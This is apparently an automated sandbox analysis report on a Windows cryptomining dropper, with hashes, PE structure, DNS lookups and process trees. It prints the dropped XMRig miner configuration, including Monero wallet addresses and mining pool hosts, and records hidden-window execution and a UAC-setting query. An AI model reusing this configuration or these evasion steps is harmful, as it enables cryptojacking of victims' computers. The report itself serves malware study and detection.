SHA-512:	EE6057A92328E756599DFAF998081B88F56EDF486C8ADBB5EA8F7DA8B718693D502314C2260F9B1FDC7196F2033DDE7C30ABF06BAD8AB1F45655DF2599DFC9CD
Malicious:	false
Preview:	{.."autosave": true,.."background": true,.."title": true,.."cpu": true,.."opencl": false,.."cuda": false,.."retries": 1,.."retry-pause": 2,.."pools": [..{.."algo": "rx/0",.."coin": "XMR",.."url": "auto.c3pool.org:13333",.."user": "8Bg9mc5vUWw8dL8jCxbVda9ukMHxpisqmfCaaUDbngS8jGRS7cuRu1HC6m2dEKZW7yBpDQ3fRQtFShEDXTSbQ9pf5Tk2Sut.975775562_T",.."pass": "x",.."tls": false,.."keepalive": true,.."nicehash": false..},..{.."algo": "rx/0",.."coin": "XMR",.."url": "auto.c3pool.org:443",.."user": "84xqDGx3bA2NjVyZ5vC3dG5ivgAd5wFxjMXEGV6BuxV8EkPLvqERcSMGXBkwQptbUTA8goW42GCUK4EYaB8z6gXoEmkBPeH.975775562_T",.."pass": "x",.."tls": false,.."keepalive": true,.."nicehash": false..},..{.."algo": "rx/0",.."coin": "XMR",.."url": "xmr.2miners.com:2222",.."user": "84xqDGx3bA2NjVyZ5vC3dG5ivgAd5wFxjMXEGV6BuxV8EkPLvqERcSMGXBkwQptbUTA8goW42GCUK4EYaB8z6gXoEmkBPeH.975775562_T",.."pass": "x",.."tls": false,.."keepalive": true,.."nicehash": false..}..]..}..

C:\Windows\SysWOW64\en\co2.avi

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	264
Entropy (8bit):	5.579378925177609
Encrypted:	false
SSDEEP:	6:e5odPXvqzm8giMafKn71g7pqfAWFZLabXx1EXYfFROMfoIj:Yo9i6x7ao71g7plWPazAYEMTj
MD5:	B01A9D0151625441C4FC500F2E227439
SHA1:	0F2EC5AC6C9CFE12161512FC237E39335A82BF99
SHA-256:	3EE3ED71F81D848BF7978E0137F475D670EC59596870B0FFE0C6D8FC397B48D0
SHA-512:	A91635B587128EDBBFE1BF65E1AF3E66AA19E422BF00FCF78175756EC82022C61AB12E2AE484C2D1389CFA1CB5915EA3D1DB73242BD7D14E74BD917B49F60D96
Malicious:	false
Preview:	[RandomX]..wallet = 84xqDGx3bA2NjVyZ5vC3dG5ivgAd5wFxjMXEGV6BuxV8EkPLvqERcSMGXBkwQptbUTA8goW42GCUK4EYaB8z6gXoEmkBPeH.975775562_T..pool1 = auto.c3pool.org:13333..pool2 = auto.c3pool.org:443..pool3 = xmr.2miners.com:2222..pool4 = xmr.GHhA5Joo.com:2222..noLog = true..

C:\Windows\SysWOW64\en\sc.avi

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Category:	dropped
Size (bytes):	45568
Entropy (8bit):	7.750275657742685
Encrypted:	false
SSDEEP:	768:UDR7drWxRrYJAgERvFAREX5DyzaccyOkVDIBF9K/phcanwUaajMIWCW2jsV:2A3cJAgmSRC5DcLxIBLGwUgIW2sV
MD5:	A1CD6A64E8F8AD5D4B6C07DC4113C7EC
SHA1:	60E2F48A51C061BBA72A08F34BE781354F87AA49
SHA-256:	B994AE5CBFB5AD308656E9A8BF7A4A866FDEB9E23699F89F048D7F92E6BB8577
SHA-512:	87A42901A63793653D49F1C6D410A429CABB470B4C340C4553CBD9ECCACB38D8543F85455465E0A432D737E950C590175DAD744094861F7C3E575446A65B41E8
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 12%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6...W...W...W..=X..W...t...W..$t...W...t...W..=X..W...W...V.....W......W......W..Rich.W..........................PE..L...-'C].........................................@.................................................................................................................................................................................................UPX0....................................UPX1................................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................................................3.03.UPX!....

\Device\ConDrv

Download File

Process:	C:\Windows\SysWOW64\wbem\WMIC.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	28
Entropy (8bit):	4.208966082694623
Encrypted:	false
SSDEEP:	3:nLWGWNI3ov:nyGWNOov
MD5:	F2CE4C29DC78D5906090690C345EAF80
SHA1:	D12E3B86380F0DBEF4FBDFFE2CBFE2144FB7E9CD
SHA-256:	0356A869FC7E6495BAC33303B002935C317166D0EA5D403BE162573CF01055D8
SHA-512:	51F939C41710BC3A4E443CDAF33AAE614B043ACC2382A0C836049E34D2F51C8195FD149548752B33E4EDD4299548BB1957B89997FC640C837C9400D76FEA5B74
Malicious:	false
Preview:	No Instance(s) Available....

\Device\Null

Download File

Process:	C:\Windows\SysWOW64\attrib.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	134
Entropy (8bit):	4.756669205234865
Encrypted:	false
SSDEEP:	3:PtwyFU6uVN18CzKCVPtwyFU6uVNOLSk3ACXVn:+NP1F5PGNPWS+nFn
MD5:	BA597551DBA95670981C343CA015D82E
SHA1:	2B648FAF5368C2C6CCFFFD4819D2969B32BE641A
SHA-256:	44CDE187D7B8061C3655F1F11B4663F9863A6F752B887FD3060C9BCDA9E9AC7A
SHA-512:	DDC041072C4496E8A622ABD895830FDD9D1C6BE1109F5FEEC31411773710093F2A45689B1C13F206B0A5E3AA83D617A93F1D4F2212A539A9974BBC3588238EAA
Malicious:	false
Preview:	Access denied - C:\Windows\SysWOW64\en\AuthFWSnapIn.Resources.dll..Access denied - C:\Windows\SysWOW64\en\AuthFWWizFwk.Resources.dll..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.5611612679491165
TrID:	Win32 Executable (generic) a (10002005/4) 92.60% Win32 Executable Borland Delphi 7 (665061/41) 6.16% InstallShield setup (43055/19) 0.40% UPX compressed Win32 Executable (30571/9) 0.28% Win32 EXE Yoda's Crypter (26571/9) 0.25%
File name:	K4gsPJGEi4.exe
File size:	13'410'304 bytes
MD5:	997f25415b30c6da407a75c55806d752
SHA1:	5efadd4bfb032e773492a42c391b3be12eabbe98
SHA256:	a606d29ead61ee09f59236f0c105763d1e3aba914edc30210425049ad5ce275b
SHA512:	d752d2fbc5c82df7f1141d0bc3b16ba17d3fd8d0dadb959cf7ba62735e9bdc21ae49d5d96de797e231a4a442cb0287a4b5b6f72a9f375b910e288f645ff9c09d
SSDEEP:	196608:zAhYdQPyedZLOOW7jjVBTTT/Y7Te1LWZH7lDsnNk1wsy:zAm57GGLWZH7lMG1ly
TLSH:	30D69E22F29344F8C5679270562BA773BA31FC654730AEAB7354EB381E62ED0193DB14
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	be9f361733110601

Static PE Info

General

Entrypoint:	0x4138e0
Entrypoint Section:	CODE
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp:	0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	8121da246ea94cbab5bbea46d181bdcb

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
mov ecx, 0000000Dh
push 00000000h
push 00000000h
dec ecx
jne 00007F0208E8221Bh
push ebx
push esi
push edi
mov eax, 00413850h
call 00007F0208E74155h
xor eax, eax
push ebp
push 00413FACh
push dword ptr fs:[eax]
mov dword ptr fs:[eax], esp
mov eax, 00000190h
call 00007F0208E80D01h
test al, al
je 00007F0208E82229h
push 00000000h
call 00007F0208E7422Eh
lea edx, dword ptr [ebp-14h]
mov eax, 00000001h
call 00007F0208E711EDh
mov eax, dword ptr [ebp-14h]
push eax
lea edx, dword ptr [ebp-18h]
xor eax, eax
call 00007F0208E711DFh
mov edx, dword ptr [ebp-18h]
pop eax
call 00007F0208E7281Eh
jne 00007F0208E8225Dh
call 00007F0208E81C97h
mov eax, 0000000Ah
call 00007F0208E81239h
jmp 00007F0208E82288h
lea edx, dword ptr [ebp-1Ch]
mov eax, 00000001h
call 00007F0208E711B6h
mov eax, dword ptr [ebp-1Ch]
push eax
lea edx, dword ptr [ebp-20h]
xor eax, eax
call 00007F0208E711A8h
mov edx, dword ptr [ebp-20h]
pop eax
call 00007F0208E727E7h
jne 00007F0208E822B5h
lea edx, dword ptr [ebp-24h]
mov eax, 00000001h
call 00007F0208E7118Ch
mov eax, dword ptr [ebp-24h]
push eax
lea eax, dword ptr [ebp-28h]
push eax
lea edx, dword ptr [ebp-2Ch]
xor eax, eax
call 00007F0208E7117Ah
mov eax, dword ptr [ebp-2Ch]
mov ecx, 00000003h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x17000	0xa50	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1c000	0xcb38a8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1a000	0x18b8	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x19000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
CODE	0x1000	0x13044	0x13200	f244922fda075765e8f17189a4294935	False	0.5482792075163399	data	6.435944838336945	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
DATA	0x15000	0x60c	0x800	d769b11b951aa1676a9b56ed8657f9e0	False	0.388671875	data	3.518626014393411	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
BSS	0x16000	0xca5	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x17000	0xa50	0xc00	f12761531f848d781df349820c2c9510	False	0.36328125	data	4.261862699947735	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x18000	0xc	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x19000	0x18	0x200	84ec229773168945be103e78a704bd09	False	0.05078125	data	0.2044881574398449	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc	0x1a000	0x18b8	0x1a00	4bd4a9c9fd181c01c407ce5b4b897f2d	False	0.7173978365384616	data	6.528367230126052	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc	0x1c000	0xcb38a8	0xcb3a00	6386372ab0a8d94c886e436b2e379007	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x1c520	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 320	English	United States	0.47326589595375723
RT_ICON	0x1ca88	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1152	English	United States	0.7639891696750902
RT_STRING	0x1d330	0x18e	data	English	United States	0.5226130653266332
RT_STRING	0x1d4c0	0x6c	data	English	United States	0.49074074074074076
RT_STRING	0x1d52c	0x15c	data			0.4511494252873563
RT_STRING	0x1d688	0x208	data			0.45
RT_STRING	0x1d890	0xec	data			0.5550847457627118
RT_STRING	0x1d97c	0x198	data			0.5171568627450981
RT_STRING	0x1db14	0x3b4	data			0.33649789029535865
RT_STRING	0x1dec8	0x37c	data			0.4080717488789238
RT_STRING	0x1e244	0x2a0	data			0.4017857142857143
RT_RCDATA	0x1e4e4	0xb200	PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed			0.9310919943820225
RT_RCDATA	0x296e4	0x15a00	PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows			0.41983155708092484
RT_RCDATA	0x3f0e4	0x3177d8	PE32 executable (GUI) Intel 80386, for MS Windows			0.44219398498535156
RT_RCDATA	0x3568bc	0x5fe00	PE32 executable (console) Intel 80386, for MS Windows			0.25558435870273793
RT_RCDATA	0x3b66bc	0x105dd1	PE32 executable (console) Intel 80386, for MS Windows			0.2728891372680664
RT_RCDATA	0x4bc490	0x38d0	PE32+ executable (native) x86-64, for MS Windows			0.5543866886688669
RT_RCDATA	0x4bfd60	0x7f2200	PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows			0.44277095794677734
RT_RCDATA	0xcb1f60	0x1d7be	data			0.13911200172233906
RT_RCDATA	0xccf720	0x10	data			1.5
RT_RCDATA	0xccf730	0xb0	data			0.8863636363636364
RT_RCDATA	0xccf7e0	0xa2	data			0.7037037037037037
RT_GROUP_ICON	0xccf884	0x22	data	English	United States	0.9705882352941176

Imports

DLL	Import
kernel32.dll	DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
user32.dll	GetKeyboardType, LoadStringA, MessageBoxA, CharNextA
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegCloseKey
oleaut32.dll	SysFreeString, SysReAllocStringLen, SysAllocStringLen
kernel32.dll	TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
kernel32.dll	WriteFile, WaitForSingleObject, VirtualQuery, Sleep, SetFilePointer, SetEvent, SetEndOfFile, ResetEvent, ReadFile, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GetVersionExA, GetTickCount, GetThreadLocale, GetStringTypeExA, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetEnvironmentVariableA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCPInfo, GetACP, FreeLibrary, FormatMessageA, ExitProcess, EnumCalendarInfoA, EnterCriticalSection, DeviceIoControl, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
user32.dll	MessageBoxA, LoadStringA, GetSystemMetrics, CharNextA, CharToOemA
kernel32.dll	Sleep
oleaut32.dll	SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
winmm.dll	waveOutGetNumDevs

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 4, 2024 18:09:40.169636011 CEST	55908	53	192.168.2.5	1.1.1.1
Jul 4, 2024 18:09:40.180214882 CEST	53	55908	1.1.1.1	192.168.2.5
Jul 4, 2024 18:09:44.791421890 CEST	51023	53	192.168.2.5	1.1.1.1
Jul 4, 2024 18:09:44.802342892 CEST	53	51023	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 4, 2024 18:09:40.169636011 CEST	192.168.2.5	1.1.1.1	0x809c	Standard query (0)	auth11.aeroadmin.com	A (IP address)	IN (0x0001)	false
Jul 4, 2024 18:09:44.791421890 CEST	192.168.2.5	1.1.1.1	0x4815	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jul 4, 2024 18:09:40.180214882 CEST	1.1.1.1	192.168.2.5	0x809c	No error (0)	auth11.aeroadmin.com	89.40.115.70	A (IP address)	IN (0x0001)	false
Jul 4, 2024 18:09:44.802342892 CEST	1.1.1.1	192.168.2.5	0x4815	No error (0)	auto.c3pool.org	5.75.158.61	A (IP address)	IN (0x0001)	false
Jul 4, 2024 18:09:44.802342892 CEST	1.1.1.1	192.168.2.5	0x4815	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false

Target ID:	0
Start time:	12:08:53
Start date:	04/07/2024
Path:	C:\Users\user\Desktop\K4gsPJGEi4.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\K4gsPJGEi4.exe"
Imagebase:	0x400000
File size:	13'410'304 bytes
MD5 hash:	997F25415B30C6DA407A75C55806D752
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000000.00000003.2164211279.0000000002D34000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000000.00000003.2159430929.000000000349C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000000.00000003.2159430929.000000000349C000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000000.00000000.2137379711.0000000000EB9000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000000.00000000.2137379711.0000000000EB9000.00000002.00000001.01000000.00000003.sdmp, Author: unknown Rule: Linux_Trojan_Pornoasset_927f314f, Description: unknown, Source: 00000000.00000003.2159430929.0000000002EA0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Linux_Trojan_Pornoasset_927f314f, Description: unknown, Source: 00000000.00000000.2137379711.0000000000789000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	12:08:56
Start date:	04/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Start.cmd" "
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	12:08:56
Start date:	04/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	12:08:56
Start date:	04/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\Start.cmd"
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	12:08:56
Start date:	04/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	12:08:56
Start date:	04/07/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\reg.exe query "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin"
Imagebase:	0x520000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	12:08:56
Start date:	04/07/2024
Path:	C:\Windows\SysWOW64\find.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\find.exe "0x0"
Imagebase:	0x7f0000
File size:	14'848 bytes
MD5 hash:	15B158BC998EEF74CFDD27C44978AEA0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	12:08:57
Start date:	04/07/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\est1.vbs"
Imagebase:	0xb70000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	12:08:57
Start date:	04/07/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\timeout.exe /t 1
Imagebase:	0x560000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	12:08:57
Start date:	04/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\est1.cmd"
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	12:08:57
Start date:	04/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	12:08:58
Start date:	04/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c type "C:\Users\user\AppData\Local\Temp\Start.cmd"
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	12:08:58
Start date:	04/07/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Vnoad.vbs"
Imagebase:	0xb70000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	12:08:58
Start date:	04/07/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\timeout.exe /t 1
Imagebase:	0x560000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	12:08:59
Start date:	04/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\two.cmd"
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	12:08:59
Start date:	04/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	17
Start time:	12:08:59
Start date:	04/07/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\timeout.exe /t 1
Imagebase:	0x560000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	12:08:59
Start date:	04/07/2024
Path:	C:\Users\user\AppData\Local\Temp\screen.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\screen.exe" win hide ititle "cod2"
Imagebase:	0x400000
File size:	45'568 bytes
MD5 hash:	A1CD6A64E8F8AD5D4B6C07DC4113C7EC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_NirCmd, Description: Yara detected NirCmd tool, Source: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
Antivirus matches:	Detection: 12%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	12:08:59
Start date:	04/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /S /D /c" echo "C:\Users\user\AppData\Local\Temp" 2>NUL"
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	12:08:59
Start date:	04/07/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\findstr.exe /i /c:"Local"
Imagebase:	0x710000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	12:08:59
Start date:	04/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /S /D /c" echo "C:\Users\user" 2>NUL"
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	12:08:59
Start date:	04/07/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\findstr.exe /i /c:"'"
Imagebase:	0x710000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	12:08:59
Start date:	04/07/2024
Path:	C:\Users\user\AppData\Local\Temp\screen.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\screen.exe" win hide ititle "cod2"
Imagebase:	0x400000
File size:	45'568 bytes
MD5 hash:	A1CD6A64E8F8AD5D4B6C07DC4113C7EC
Has elevated privileges:	true
